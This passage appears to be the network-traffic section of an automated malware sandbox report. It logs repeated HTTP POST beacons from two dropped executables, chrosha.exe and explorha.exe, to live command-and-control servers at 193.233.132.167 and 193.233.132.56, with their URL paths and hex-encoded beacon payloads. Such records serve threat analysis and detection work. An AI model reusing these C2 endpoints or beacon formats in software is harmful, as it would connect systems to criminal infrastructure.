                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:29.116163015 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      545192.168.2.550390193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:29.434799910 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:29.677577019 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:29 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      546192.168.2.550391193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:29.465657949 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:29.709728003 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:29 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      547192.168.2.550392193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:29.923275948 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:30.168143034 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:30 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      548192.168.2.550393193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:29.956307888 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:30.201739073 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:30 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      549192.168.2.550394193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:30.527277946 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:30.773710966 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:30 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      550192.168.2.550395193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:30.549860001 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:30.791482925 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:30 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      551192.168.2.550396193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:31.022213936 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:31.268595934 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:31 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      552192.168.2.550397193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:31.045983076 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:31.298574924 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:31 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      553192.168.2.550398193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:31.638062000 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:31.890132904 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:31 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      554192.168.2.550399193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:31.661407948 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:31.904953957 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:31 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      555192.168.2.550400193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:32.141104937 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:32.392848969 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      556192.168.2.550401193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:32.152057886 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:32.398381948 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      557192.168.2.550402193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:32.757859945 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:33.002264023 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      558192.168.2.550403193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:32.763286114 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:33.011971951 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      559192.168.2.550404193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:33.254697084 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:33.506635904 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      560192.168.2.550405193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:33.264170885 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:33.516966105 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


